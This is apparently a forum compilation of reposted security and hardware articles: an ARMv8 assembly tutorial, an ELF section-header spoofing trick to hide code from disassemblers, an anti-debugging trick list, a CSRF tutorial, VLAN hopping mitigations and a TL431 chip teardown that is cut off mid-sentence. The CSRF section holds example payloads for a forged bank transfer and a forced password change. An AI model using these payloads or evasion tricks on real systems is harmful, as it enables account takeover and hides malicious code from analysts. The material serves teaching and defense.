x29, x30, [sp], 80 #load values from stack now I can describe load/store instructions, don’t care addressing mode, I show you only few example. Single Register Save a register into a memory ldr: Load register works with: Register offset: LDR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}] Immediate offset: LDR <Xt>, [<Xn|SP>], #<simm> PC-relative literal: LDR <Xt>, <label [*]str: Store register: register offset: STR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}] immediate offset: STR <Xt>, [<Xn|SP>], #<simm> <simm> is signed immediate byte offset, in the range -256 to 255 Pair of Registers Save the two registers specified into memory address of Xn or SP ldp load pair: LDP <Xt1>, <Xt2>, [<Xn|SP>], #<imm> stp store pair: STP <Xt1>, <Xt2>, [<Xn|SP>], #<imm> <imm> is signed immediate byte offset, a multiple of 8 in the range -512 to 504 [h=3]Data processing – immediate[/h] Arithmetic (immediate) [TABLE] [TR] [TD]ADD[/TD] [TD]ADD (immediate)[/TD] [TD]ADD <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn + shift(imm)[/TD] [/TR] [TR] [TD]ADDS[/TD] [TD]Add and set flags[/TD] [TD][/TD] [/TR] [TR] [TD]SUB[/TD] [TD]Subtract[/TD] [TD] SUB <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn – shift(imm)[/TD] [/TR] [TR] [TD]SUBS[/TD] [TD]Subtract and set flags[/TD] [TD][/TD] [/TR] [TR] [TD]CMP[/TD] [TD]Compare[/TD] [TD] CMP <Xn|SP>, #<imm>{, <shift>}[/TD] [/TR] [TR] [TD]CMN[/TD] [TD]Compare negative[/TD] [TD][/TD] [/TR] [/TABLE] Where: <shift> Is the optional shift type to be applied to the second source operand, defaulting to LSL. The shift operators LSL (logical shift left), ASR (arithm sift right) and LSR (logical shift right) accept an immediate shift <amount> in the range 0 to one less than the register width of the instruction, inclusive. Logical [TABLE] [TR] [TD]AND[/TD] [TD]Bitwise[/TD] [TD]AND <Xd|SP>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR] [TR] [TD]ANDS[/TD] [TD]Bitwise AND and set flags[/TD] [TD]ANDS <Xd>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR] [TR] [TD]EOR[/TD] [TD]Bitwise exclusive[/TD] [TD]EOR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn EOR imm[/TD] [/TR] [TR] [TD]ORR[/TD] [TD]Bitwise inclusive[/TD] [TD]ORR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn OR imm[/TD] [/TR] [TR] [TD]TST[/TD] [TD]Test bits[/TD] [TD]TST <Xn>, #<imm> ;Rn AND imm[/TD] [/TR] [/TABLE] Move Instructions to move wide immediate (16bit): [TABLE] [TR] [TD]MOVZ[/TD] [TD]Move wide with zero[/TD] [TD] MOVZ <Xd>, #<imm>{, LSL #<shift>} ;Rd = LSL (imm16, shift)[/TD] [/TR] [TR] [TD]MOVN[/TD] [TD]Move wide with NOT[/TD] [TD] MOVN <Xd>, #<imm>{, LSL #<shift>} ;Rd = NOT (LSL (imm16, shift))[/TD] [/TR] [TR] [TD]MOVK[/TD] [TD]Move 16-bit immediate into register, keeping other bits unchange[/TD] [TD] MOVK <Xd>, #<imm>{, LSL #<shift>} ; Rd<shift+15:shift> = imm16[/TD] [/TR] [/TABLE] There are also an instruction to move immediate: MOV <Xd>, #<imm> ;Rd = imm but his three versions are aliases of movz, movn and movk PC-relative address calculation The ADR instruction adds a signed, 21-bit immediate to the value of the program counter that fetched this instruction, and then writes the result to a general-purpose register: ADR <Xd>, <label> The ADRP instruction permits the calculation of the address at a 4KB aligned memory region. In conjunction with an ADD(immediate) instruction, or a Load/Store instruction with a 12-bit immediate offset, this allows for the calculation of, or access to, any address within ±4GB of the current PC: ADRP <Xd>, <label> Shift [TABLE] [TR] [TD]ASR[/TD] [TD]Arithmetic shift right[/TD] [TD] ASR <Xd>, <Xn>, #<bits to shift>[/TD] [/TR] [TR] [TD]LSL[/TD] [TD]Logical shift left[/TD] [TD] LSL <Xd>, <Xn>, #<shift>[/TD] [/TR] [TR] [TD]LSR[/TD] [TD]Logical shift right[/TD] [TD] LSR <Xd>, <Xn>, #<shift>[/TD] [/TR] [TR] [TD]ROR[/TD] [TD]Rotate right[/TD] [TD] ROR <Xd>, <Xs>, #<bits to shift>[/TD] [/TR] [/TABLE] [h=3]Data processing – register[/h] Arithmetic (shifted register) ADD: Add ADDS: Add and set setting the condition flags SUB: Subtract SUBS: Subtract and set flags CMN: Compare negative CMP: Compare NEG: Negate ; Rd = 0 – shift(Rm, amount) NEGS: Negate and set flags How ADD works, the others are similar: ADD <Xd>, <Xn>, <Xm>{, <shift> #<amount>} Rd = Rn + shift(Rm, amount); There’re also the Arithmetic with carry instructions which accept two source registers, with the carry flag as an additional input to the calculation and don’t support shift. ADC: Add with carry ADC <Xd>, <Xn>, <Xm> ADCS: Add with carry and set flags ADCS <Xd>, <Xn>, <Xm> ;Rd = Rn + Rm + C SBC: Subtract with carry SBC <Xd>, <Xn>, <Xm> ;Rd = Rn – Rm – 1 + C SBCS: Subtract with carry and set flags NGC: Negate with carry NGC <Xd>, <Xm> ;Rd = 0 – Rm – 1 + C NGCS: Negate with carry and set flags Logical (shifted register) AND: Bitwise AND ANDS: Bitwise AND and set flags BIC: Bitwise bit clear Rd = Rn AND NOT shift(Rm, amount) BICS: Bitwise bit clear and set flags EON: Bitwise exclusive OR NOT Rd = Rn EOR NOT shift(Rm, amount) EOR: Bitwise exclusive OR Rd = Rn EOR shift(Rm, amount) ORR: Bitwise inclusive OR MVN: Bitwise NOT Rd = NOT shift(Rm, amount) ORN: Bitwise inclusive OR NOT Rd = Rn OR NOT shift(Rm, amount) TST: Test bits Rn AND shift(Rm, amount) How they work: AND <Xd>, <Xn>, <Xm>{, <shift> #<amount>} Rd = Rn AND shift(Rm, amount) Here <shift> has the default shift operators more the ROR (rotate right) Multiply and divide MADD Multiply-add MADD <Xd>, <Xn>, <Xm>, <Xa>; Rd = Ra + Rn * Rm MSUB Multiply-subtract MNEG Multiply-negate MUL Multiply MUL <Xd>, <Xn>, <Xm>; Rd = Rn * Rm SMADDL Signed multiply-add long SMSUBL Signed multiply-subtract long SMNEGL Signed multiply-negate long SMULL Signed multiply long SMULH Signed multiply high UMADDL Unsigned multiply-add long UMSUBL Unsigned multiply-subtract long UMNEGL Unsigned multiply-negate long UMULL Unsigned multiply long UMULH Unsigned multiply high SDIV Signed divide SDIV <Xd>, <Xn>, <Xm>; Rd = Rn / Rm UDIV Unsigned divide Move The Move (register) instructions are aliases for other data processing instructions. They copy a value from a general-purpose register to another general-purpose register or the current stack pointer, or from the current stack pointer to a general-purpose register. MOV <Xd>, <Xm> Xd = Xm; Shift (register) ASRV: Arithmetic shift right variable LSLV: Logical shift left variable LSRV: Logical shift right variable RORV: Rotate right variable An example: ASRV <Xd>, <Xn>, <Xm> Rd = ASR(Rn, Rm) There’re alias instructions that haven’t the ending V. CRC32 The optional CRC32 instructions operate on the general-purpose register file to update a 32-bit CRC value from an input value comprising 1, 2, 4, or 8 bytes. There are two different classes of CRC instructions, CRC32 and CRC32C, that support two commonly used 32-bit polynomials, known as CRC-32 and CRC-32C. Conditional select The Conditional select instructions select between the first or second source register, depending on the current state of the condition flag [TABLE] [TR] [TD]CSEL[/TD] [TD]Conditional select[/TD] [TD]CSEL <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else Rm[/TD] [/TR] [TR] [TD]CSINC[/TD] [TD]Conditional select increment[/TD] [TD]CSINC <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else (Rm + 1)[/TD] [/TR] [TR] [TD]CSINV[/TD] [TD]Conditional select inversion[/TD] [TD]CSINV <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else NOT (Rm)[/TD] [/TR] [TR] [TD]CSNEG[/TD] [TD]Conditional select negation[/TD] [TD] CSNEG <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else -Rm[/TD] [/TR] [TR] [TD]CSET[/TD] [TD]Conditional set[/TD] [TD]CSET <Xd>, <cond> ;Rd = if cond then 1 else 0[/TD] [/TR] [TR] [TD]CSETM[/TD] [TD]Conditional set mask[/TD] [TD] CSETM <Xd>, <cond> ;Rd = if cond then -1 else 0[/TD] [/TR] [TR] [TD]CINC[/TD] [TD]Conditional increment[/TD] [TD] CINC <Xd>, <Xn>, <cond> ;Rd = if cond then Rn+1 else Rn[/TD] [/TR] [TR] [TD]CINV[/TD] [TD]Conditional invert[/TD] [TD] CINV <Xd>, <Xn>, <cond> ;Rd = if cond then NOT(Rn) else Rn[/TD] [/TR] [TR] [TD]CNEG[/TD] [TD]Conditional negate[/TD] [TD] CNEG <Xd>, <Xn>, <cond> ;Rd = if cond then -Rn else Rn[/TD] [/TR] [/TABLE] Conditional comparison The Conditional comparison instructions provide a conditional select for the NZCV condition flags, setting the flags to the result of an arithmetic comparison of its two source register values if the named input condition is true, or to an immediate value if the input condition is false. There are register and immediate forms. The immediate form compares the source register to a small 5-bit unsigned value. [TABLE] [TR] [TD]CCMN[/TD] [TD]Conditional compare negative (register)[/TD] [TD]CCMN <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, -Rm) else #nzcv[/TD] [/TR] [TR] [TD]CCMN[/TD] [TD]Conditional compare negative (immediate)[/TD] [TD]CCMN <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #-imm) else #nzcv[/TD] [/TR] [TR] [TD]CCMP[/TD] [TD]Conditional compare (register)[/TD] [TD]CCMP <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, Rm) else #nzcv[/TD] [/TR] [TR] [TD]CCMP[/TD] [TD]Conditional compare (immediate)[/TD] [TD]CCMP <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #imm) else #nzcv[/TD] [/TR] [/TABLE] Where: <nzcv> is the flag bit specifier, an immediate in the range 0 to 15, giving the alternative state for the 4-bit NZCV condition flags, encoded in the nzcv field. <imm> Is a five bit unsigned (positive) immediate encoded in the imm5 field. How ccmop works: it checks NZCV flags for <cond>, if previous comparison passed, do this one and set NZCV, otherwise set NZCV to <imm>. If we have to write this code: x0 >= x1 && x2 == x3 in arm assembly, with ccmp we can do this: cmp x0, x1 ccmp x2, x3, #0, ge beq good [h=2]Assembly Example:[/h] It’s time to code!! Like others tutorial on assembly I show first the C-like code and then ARM asm. #include "stdio.h" static int v[] = {1,2,3,4,5,6,7,8,9,10}; void print(int i); int add(int v, int t); int main() { int i; int array[10]; for(i=0; i < 10; i++) array = v * (add(i,5)); return 0; } int add(int v, int t) { return v + t; } Now this is the asm code generated by GCC, you need to download Linaro GCC to code on ARMv8: .cpu generic+fp+simd .data .align 3 .type v, %object .size v, 40 ;v array v: .word 1 .word 2 .word 3 .word 4 .word 5 .word 6 .word 7 .word 8 .word 9 .word 10 ;dump: 0000000000410918 : 410918: 00000001 .word 0x00000001 41091c: 00000002 .word 0x00000002 410920: 00000003 .word 0x00000003 410924: 00000004 .word 0x00000004 410928: 00000005 .word 0x00000005 41092c: 00000006 .word 0x00000006 410930: 00000007 .word 0x00000007 410934: 00000008 .word 0x00000008 410938: 00000009 .word 0x00000009 41093c: 0000000a .word 0x0000000a ; end dump .text .align 2 .global main .type main, %function main: stp x29, x30, [sp, -80]! ;save register into sp-80 and sp-88, and free memory for array ;remember the Pre-indexed addressing add x29, sp, 0 ; frame pointer = stack pointer str x19, [sp,16] ;store r19 - remember Base plus offset ;first loop str wzr, [x29,76] ;i=0 -> wzr: zero register b .L2 ;branch to label .L3: adrp x0, v ;calc label address --> dump: adrp x0, 410000 add x1, x0, :lo12:v ; --> dump: add x1, x0, #0x918 see above 0x410918 dump ldrsw x0, [x29,76] ;load signed word (i variable) lsl x0, x0, 2 ;logical shift left (as mult for 2^2), it need to calc i-offset add x0, x1, x0 ldr w19, [x0] ; w19 = v[i] ldr w0, [x29,76] ;remember [x29,76] is i ;remeber w0 is paramer register mov w1, 5 ;w1 is a param register bl add ;call add(w0, w1) mul w1, w19, w0 ;w0 after a bl has result value ;w1 = v[i] * add(w0,w1) add x2, x29, 32 ;array base address: FP+32 ldrsw x0, [x29,76] ;load i variable lsl x0, x0, 2 ;calc the add x0, x2, x0 ;array[i] offset as for v[i] str w1, [x0] ;save w1 into x0 address ldr w0, [x29,76] add w0, w0, 1 ; i += 1 str w0, [x29,76] .L2: ldr w0, [x29,76] cmp w0, 9 ble .L3 ; if i <= 9 re-start loop ;end of first for cicle mov w0, 0 ;w0 is the result register in this case ldr x19, [sp,16] ;re-load old x19 value ldp x29, x30, [sp], 80 ;re-load old frame pointer and return address .size main, .-main .section .rodata .align 2 .global add .type add, %function add: ;start of generic prologue sub sp, sp, #16 ;free memory for 2 register str w0, [sp,12] ; save the first param str w1, [sp,8] ;save the second param ;end of prologue ;code ldr w1, [sp,12] ;load the first param ldr w0, [sp,8] ;load second param add w0, w1, w0 ;w0 has the result value ;epilogue add sp, sp, 16 ;free the stack ret ;return to address in x30 .size add, .-add To run this code, you can use ARM Foundation Model (it’s free) how you see here: the Hello World in ARMv8 Sursa: Introduction to ARMv8 64-bit Architecture
  9. [h=1]Hiding code in ELF binary[/h] Written by aaSSfxxx - 11 december 2013 Since I'm contributing to the radare2, I'm learning on how a disassembler works, and especially how ELF files are handled by disassemblers. I saw that almost (even every ?) disassemblers rely on ELF section headers (generally located at the end of the file), which has never used in reality (by Linux kernel or glibc) because ELF's mapping in memory is given by program header (another ELF structure, which I described in my article about ELF packer So, we can easily hide code from disassemblers by manipulating virtual address fields of the ".text" section structure. I'll use an hexadecimal editor and the latest git revision of radare2 (which fixes a bug related to virtual address calculation in ELF binary), so I recommand you to have those tools installed of your computer to continue the reading of this article. [h=2]The trick[/h] First, let's start with the following code: int main() { printf("You will never see me !\n"); return 0; } int foo() { return 1; } The goal of this article is to make disassemblers believe that the entrypoint of the binary is the "foo" function (and not the _start function added by gcc). First, let's compile the source code to work on the generated executable. Then we need to grab the offset of the "foo" symbol, by doing Code C : rabin2 -s | grep foo and note the offset of the symbol somewhere. Then we'll strip all symbols of the binary (to avoid corrupted disassembly in IDA) using the "strip" command on our binary. Then we need to retrieve the section offset in the binary which is located at offset 0x20 of the file (for 32-bit executables, I don't have 64bit system yet so please tell me if it still works). Then we use radare2 (and the tool rabin2) to have the index in the array of sections of section .text we'll spoof. So we execute Code BASH : rabin2 -S a.out | grep .text and note the "idx" field somewhere. To find the section we just need to calculate Code PSEUDO : section_offset + (idx+1)*0x28 0x28 is the size of a section header entry, and we need to add 1 to the idx we got from radare2 because it seems to ignore the null section at the beginning. Then go to the offset calculated above, and then modify the "sh_offset" of the Elf_Shdr structure (at offset 0x10 relative to the beginning of the structure). Don't forget that we work in little endian (x86) when you edit the binary in your hex editor ! Then save the program, execute it (it should show "You will never see me !") and when you'll try to disassemble it, you will see the disassembly of the foo function as the entry point ! [h=2]What happened and how to detect it ?[/h] As I said in the introduction, kernel relies on the program header table (which generally follows the ELF header) and map PT_LOAD program headers into memory (see my articles on ELF packer I wrote). So, section headers are totally optional in ELF binaries, and are just metadata, since everything dynamic linkers need to know are stored in program headers of type PT_DYNAMIC. So we can easily spoof almost any section header without impact on a program's execution, but disassemblers (even IDA will be fooled and will produce incoherent disassembly, because disassemblers rely on section headers, which are not reliable. Anyway there are some ways to detect it. In almost binaries generated by compilers, virtual address usually have the same last digits of the offset. For exemple, 0x08048130 will match offset 0x130 in the file, or 0x0804956 can match offset 0x156. But with this manipulation we can see that offsets doesn't match at all virtual addresses, which can indicate that a binary was modified. Another way to detect it is to erase section header offset and size in the program header, which will force disassemblers (IDA and radare2 for instance) to rely on program headers for disassembly, or trying to fix section header manually. Sursa: Hiding code in ELF binary - aaSSfxxx's blog
  10. Update (03-12-2014): This tool is no longer endorsed by MorXploit as the author is no longer part of the team. Description: MorXAntiRE is a library that collect anti(debugger/disassembly/dump/VM/sandbox) tricks. MorXAntiRE is licensed under GNU/GPL version 3 and developed in C using Visual Studio 2012 and Inline Assembly. Anti-Debugging: IsDebuggerPresentAPI IsDebuggerPresentPEB CheckRemoteDebuggerPresentAPI NtQueryInformationProcess (ProcessDbgPort) NtQueryInformationProcess (ProcessDebugFlags) NtQueryInformationProcess (ProcessDebugObject) NtGlobalFlag NtSetInformationThread (HideThreadFromDebugger) Open Process Parent Process Self-Debug (CreateProcess) UnhandledExceptionFilter NtQueryObject Debugger-Attacks : BlockInputAPI OutputDebugString Timing Attacks: RDTSC Win32Timing (GetTickCount) Anti-Breakpoint: 0xCC BP detection: Memory Breakpoint Debugger Check(Guard Pages) Hardware Breakpoint Check (Debug registers with Get/SetThreadContext) Hardware Breakpoint Check (ebug registers with Structured Exception Handling) Author: Ayoub Faouzi <noteworthy_at_morxploit_dot_com> Version: MorXAntiRE v1.5 MD5: 372271696bf4a5aab6b5a4a3cf7ae794 Requirements: Windows 32bits Download: Link 1 Sursa: MorXAntiRE Anti reverse code engineering and dynamic analysis tool | MorXploit Research
  11. Exploiting linux kernel heap corruptions (SLUB Allocator) Author: Simo Ghannam <mg_at_morxploit_dot_com> Date: October 2013 MorXploit Research MorXploit Research 1. Introduction : in recent years , several researches on the Linux kernel security were done . The most common kernel privilege vulnerabilities can be divided into several categories: NULL pointer dereference , kernel space stack overflow ,kernel slab overflow , race conditions … etc. some of them are pretty easy to exploit and no need to prepare your own linux kernel debugging environment to write the exploit, and some other requires some special knowledges on Linux kernel design , routines , memory management … etc . In this tutorial we will explain how SLUB allocator works and how we can make our user-land code to be executed when we can corrupt some metadata from a slab allocator . Download: http://www.morxploit.com/morxpapers/kernel_exploit_tut.pdf
  12. Smashing Bitcoin BrainWallets, for fun and profit! Author: Simo Ben youssef Contact: sim o @morxploit.co m Published: 29 January 2014 MorXploit Research MorXploit Research Audience: IT security professionals/Bitcoin users Introduction: Have you ever created one of those "brainwallets" then the next day you went to check your wallet balance and it was all gone? Well then most likely because you have used a dictionary-based Pass-phrase and someone generated your private key based on that and imported your wallet. Attackers these days generate trillions of dictionary-based private keys and import them, resulting in the theft of other people Bitcoins. This paper will explain how such attack can be achieved. Download: http://www.morxploit.com/morxpapers/smashingbitcoins.pdf
  13. Title: Understanding Cross Site Request Forgery Author: Simo Ben youssef Contact: simo_at_morxploit_dot_com Published: 30 January 2013 MorXploit Research http://www.morxploit.com Audience: IT security professionals / Web administrators / Regular web users Introduction: Cross Site Request Forgery also known as XSRF and abbreviated as CSRF is a type of 'one click' attack, where a malicious code is used to exploit a victim's on-line account by automatically sending unauthorized instructions through the victim's browser to a vulnerable website and make changes based on the attacker's aim and the impact of the vulnerability. Examples: The attack works by making a target user click on a link which points to the attacker's malicious code, the code then sends commands to the vulnerable website which thinks that the request was willingly sent by the authenticated victim and process the changes. An example could be a request to change a password, a vulnerable website will not ask you to confirm the change by submitting your current password, or will not use some other form of verification such as token IDs, which will lead to your password being changed without your permission and therefore giving the attacker complete access to your account. The process involves three steps: 1- The victim clicks on a malicious link. 2- The link automatically requests changes to be made within the vulnerable site as defined by the attacker. 3- The website processes the change because it relies solely on the user authentication cookie. Limitations: For the attack to succeed, assuming that the attacker have successfully coded the exploit, 3 requirements are needed: 1- The target website must be vulnerable to CSRF. 2- The victim must click on a link. 3- The victim must be authenticated. Severity: According to the United States Department Of Homeland Security, CSRF vulnerability ranks in at the 909th most dangerous software bug ever found, CSRF can be used to change a victim's password, post data on the victim's behalf or even execute code remotely resulting in data compromise. Technical exploitation: In order to exploit CSRF, the attacker must have access to the same private area that the victim uses, then analyze the vulnerable HTML code. The attacker needs to determine the form input names in case the HTTP POST method is used or variable names when the HTTP GET is used instead which is very rare. The GET request can be easily exploited by using the 'img' tag to perform the malicious request. For example, the attacker can include the following hidden link on his target page: <img src="http://vulnerablebank/quickpay?senderaccount=victim&receiveraccount=attacker&amount=1000"> Which will send the specified amount of money to the attacker account. The POST request which is the most common form used is a little bit tricky and can be visually detected, the reason is that there is no way a form can be posted 'silently' using just HTML, the only way to do that is through AJAX but luckily due to AJAX security restrictions it will not be possible to exploit it because AJAX will not send your authentication cookie from a domain name other than the target domain name itself. The only way left is using JavaScript, which can automatically submit a form using the onload attribute within the body tag. An example of a form that automatically attempts to change a user's password could be: <html> <body onload="document.xploitform.submit(); "> <form name="xploitform" method="post" action="http://www.somevulnerablesite/changepassword"> <input type="hidden" name="newpassword" value='hacked'> <input type="hidden" name="confirmpassword" value='hacked'> </form></body> </html> To make this more interesting the attacker can execute the form's link as a small window pop up through another page while displaying a picture or other content to grab the victim's attention, in this particular case the attack will be a combination of both; CSRF and Social Engineering. The following code can be used to perform that: <center><img src="http://www.morxploit.com/images/logo.png"></center> <body onload="window.open('http://attackersite.com/linktothepreviousform.html','myWin','scrollbars=no,width=1,height=1,left=2000,top=2000');"> Which will display an image in the center of the page and pop up the form as a small window and place it in the corner of the page. Prevention: 1- Website side: * Requiring the use of the user's current password when requesting changes. * Implementing the use of user's hidden token IDs. 2- User side * Avoid opening external links using the same authenticated browser, use a different unauthenticated browser instead or if you are using Google Chrome, hit Shift + CTRL + N to go into incognito mode. * Experienced users can use a monitoring data tool such as the FireFox plugin Data Tamper to verify any data sent by the browser. Conclusion: CSRF are dangerous attacks that can result in data compromise when successfully exploited, it's both the website and the user responsibility to prevent such attacks. The Internet has enormous security resources, Web developers and Website Admins have no excuse to learn basic security in order to protect their customers, meanwhile users should use some common sense and stop blindly clicking on links. Author disclaimer: The information contained in this entire document are for educational and demonstration purposes only. Modification, use and publishing this information is entirely on your own risk, I cannot be held responsible for any malicious use. Sursa: http://www.morxploit.com/csrf.txt
  14. Understanding VLAN Hopping Attacks By Aaron I often receive questions from CCNP candidates around what preventative measures can mitigate a VLAN hopping attack. The confusion stems from the fact that different sources (including the official certification guide form Cisco Press) often only address one of the attack types. Even different language is frequently used to describe the same attack vector – only adding to the confusion. Here’s my attempt to help explain the two primary VLAN hopping attack types and how each works. VLAN hopping describes when an attacker connects to a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two VLAN hopping exploit methods: switch spoofing and double tagging. Switch Spoofing Switch spoofing can occur when the switch port an attacker connects to is either in trunking mode or in DTP auto-negotiation mode – both allowing devices that use 802.1q encapsulation to tag traffic with different VLAN identifiers. An attacker adds 802.1q encapsulation headers with VLAN tags for remote VLANs to its outgoing frames. The receiving switch interprets those frames as sourced from another 802.1q switch (only switches usually use 802.1q encapsulation after all), and forwards the frames into the appropriate VLAN. Switch Spoofing Mitigation The two preventive measures against switch spoofing attacks are [1] to set edge ports to static access mode and [2] disable DTP auto-negotiation on all ports. The switchport mode access command forces the port to act as an access port, disabling any chance that it could become a trunk port and send traffic for multiple VLANs. Manually disabling Dynamic Trunking Protocol (DTP) on all ports prevents access ports configured as dynamic from forming a trunk relationship with a potential attacker. Switch(config-if)# switchport mode access Switch(config-if)# switchport nonegotiate Double Tagging A double tagging attack begins when an attacker sends a frame connected to a switch port using two VLAN tags in the frame header. If the attacker is connected to an access port, the first tag matches it. If the attacker is connected to an 802.1Q trunk port, the first tag matches that of the native VLAN (usually 1). The second tag identifies the VLAN the attacker would like to forward the frame to. When the switch receives the attacker’s frames, it removes the first tag. It then forwards the frames out all of it’s trunk ports to neighbor switches (since they also use the same native VLAN). Because the second tag was never removed after it entered the first switch, the secondary switches receiving the frames see the remaining tag as the VLAN destination and forward the frames to the target port in that VLAN. Notice that this requires the attack takes place at least one switch away from the switch the attacker is physically connected to. Also, The attack requires the use of 802.1Q encapsulation. Since ISL encapsulation does not use a native or unmarked VLAN, trunks running it are not susceptible to double tagging attacks. Double Tagging Mitigation The key feature of a double tagging attack is exploiting the native VLAN. Since VLAN 1 is the default VLAN for access ports and the default native VLAN on trunks, it’s an easy target. The first countermeasure is to remove access ports from the default VLAN 1 since the attacker’s port must match that of the switch’s native VLAN. Switch(config-if)# switchport access vlan 10 Switch(config-if)# description access_port The second countermeasure is to assign the native VLAN on all switch trunks to an unused VLAN. Switch(config-if)# switchport trunk native vlan 99 Both of the above mitigation options will prevent the VLAN hopping attack, but be aware that a third option exists. You can alternatively tag the native VLAN over all trunks, disabling all untagged traffic over the interface. Switch(config-if)# switchport trunk native vlan tag Takeaways VLAN hopping is an important concept to understand when securing production data networks (or when preparing for the CCNP exams). Both switch spoofing and double tagging can be prevented with simple trunk and access port configuration parameters. It is also important to know that modern versions of Cisco IOS code drop 802.1Q tagged packets on incoming access ports, helping to limit the potential for a double tagging attack. In the end, just provision ports statically, disable DTP globally, and lock down native VLANs to make your networks more secure. VLAN hopping is a complicated topic that doesn’t have to be. Understanding the attacks and countermeasures will not only help you on exam day, but will help you keep your networks more secure. Sursa: Understanding VLAN Hopping Attacks | CCNP Guide
  15. [h=3]Reverse-engineering the TL431: the most common chip you've never heard of[/h]A die photo of the interesting but little-known TL431 power supply IC provides an opportunity to explore how analog circuits are implemented in silicon. While the circuit below may look like a maze, the chip is actually relatively simple and can be reverse-engineered with a bit of examination. This article explains how transistors, resistors, and other components are implemented in silicon to form the chip below. Die photo of the TL431. Original photo by Zeptobars. The TL431 is a "programmable precision reference"[1] and is commonly used in switching power supplies, where it provides feedback indicating if the output voltage is too high or too low. By using a special circuit called a bandgap, the TL431 provides a stable voltage reference across a wide temperature range. The block diagram of the TL431 below shows that it has a 2.5 volt reference and a comparator[1], but looking at the die shows that internally it is quite different from the block diagram. TL431 block diagram from the datasheet The TL431 has a long history; it was introduced in 1978[2] and has been a key part of many devices since then. It helped regulate the Apple II power supply, and is now used in most ATX power supplies[3] as well as the the iPhone charger and other chargers. The MagSafe adapter and other laptop adapters use it, as well as minicomputers, LEDdrivers, audio power supplies, video games and televisions.[4] The photos below show the TL431 inside six different power supplies. The TL431 comes in many different shapes and sizes; the two most common are shown below.[5] Perhaps a reason the TL431 doesn't get much attention because it looks like a simple transistor, not an IC. Six examples of power supplies using the TL431. Top row: cheap 5 volt power supply, cheap phone charger, Apple iPhone charger (also 'GB9' variant in lower left). Bottom row: MagSafe power adapter, KMS USB charger, Dell ATX power supply (with optoisolators in front) [h=2]How components are implemented in the TL431's silicon[/h] Since the TL431 is a fairly simple IC, it's possible to understand what's going on with the silicon layout by examining it closely. I'll show how the transistors, resistors, fuses, and capacitors are implemented, followed by a reverse-engineering of the full chip. [h=3]Implementing different transistor types in the IC[/h] The chip uses NPN and PNP bijunction transistors (in contrast to chips like the 6502 that use MOSFET transistors). If you've studied electronics, you've probably seen a diagram of a NPN transistor like the one below, showing the collector ©, base (, and emitter (E) of the transistor, The transistor is illustrated as a sandwich of P silicon in between two symmetric layers of N silicon; the N-P-N layers make a NPN transistor. It turns out that on the chip, the transistors look nothing like this. The base isn't even in the middle! Symbol and structure of an NPN transistor. The photo below shows one of the transistors in the TL431 as it appears on the chip. The different pink and purple colors are regions of silicon that has been doped differently, forming N and P regions. The whitish-yellow areas are the metal layer of the chip on top of the silicon - these form the wires connecting to the collector, emitter, and base. Underneath the photo is a cross-section drawing showing approximately how the transistor is constructed.[6] There's a lot more than just the N-P-N sandwich you see in books, but if you look carefully at the vertical cross section below the 'E', you can find the N-P-N that forms the transistor. The emitter (E) wire is connected to N+ silicon. Below that is a P layer connected to the base contact (. And below that is a N+ layer connected (indirectly) to the collector ©.[7] The transistor is surrounded by a P+ ring that isolates it from neighboring components. Since most of the transistor in the TL431 are NPN transistors with this structure, it's straightforward to pick out the transistors and find the collector, base, and emitter, once you know what to look for. An NPN transistor from the TL431 die, and its silicon structure. The NPN output transistor in the TL431 is much larger than the other transistors since it needs to handle the full current load of the device. While most of the transistors are operating on microamps, this transistor supports up to 100 mA. To support this current, it is large (taking up more than 6% of the entire die), and has wide metal connections to the emitter and collector. The layout of the output transistor is very different from the other NPN transistors. This transistor is built laterally, with the base between the emitter and collector. The metal on the left connects to the 10 emitters (bluish N silicon), each surrounded by pinkish P silicon for the base (middle wire). The collector (right) has one large contact. The emitter and base wires form nested "fingers". Notice how the metal for the collector gets wider from top to bottom to support the higher current at the bottom of the transistor. The image below shows a detail of the transistor, and the die photo shows the entire transistor. Closeup of the high-current output transistor in the TL431 chip. The PNP transistors have an entirely different layout from the NPN transistors. They consist of a circular emitter (P), surrounded by a ring shaped base (N), which is surrounded by the collector (P). This forms a P-N-P sandwich horizontally (laterally), unlike the vertical structure of the NPN transistors.[8] The diagram below shows one of the PNP transistors in the TL431, along with a cross-section showing the silicon structure. Note that although the metal contact for the base is on the edge of the transistor, it is electrically connected through the N and N+ regions to its active ring in between the collector and emitter. Structure of a PNP transistor in the TL431 chip. [h=3]How resistors are implemented in silicon[/h] Resistors are a key component in an analog chip such as the TL431. They are implemented as a long strip of doped silicon. (In this chip, it looks like P-silicon is used for the resistors.) Different resistances are obtained by using different lengths of resistive material: the resistance is proportional to the length-to-width ratio. The photo below shows three resistors on the die. The three long horizontal strips are the resistive silicon that forms the resistors. Yellowish-white metal conductors pass over the resistors. Note the square contacts where the metal layer is connected to the resistor. The positions of these contacts control the active length of the resistor and thus the resistance. The resistance of the resistor on the bottom is slightly larger because the contacts are slightly farther apart. The top two resistors are connected in series by the metal on the upper left. Resistors in the TL431. Resistors in ICs have very poor tolerance - the resistance can vary 20% from chip to chip due to variations in the manufacturing process. This is obviously a problem for a precision chip like the TL431. For this reason, the TL431 is designed so the important parameter is the ratio of resistances, especially R1, R2, R3, and R4. As long as the resistances all vary in the same ratio, their exact values don't matter too much. The second way the chip reduces the effect of variation is in the chip layout. The resistors are laid out in parallel bands of the same width to reduce the effect of any asymmetry in the silicon's resistance. The resistors are also placed close together to minimize any variation in silicon properties between different parts of the chip. Finally, the next section shows how the resistances can be adjusted before the chip is packaged, to fine-tune the chip's performance. [h=3]Silicon fuses to 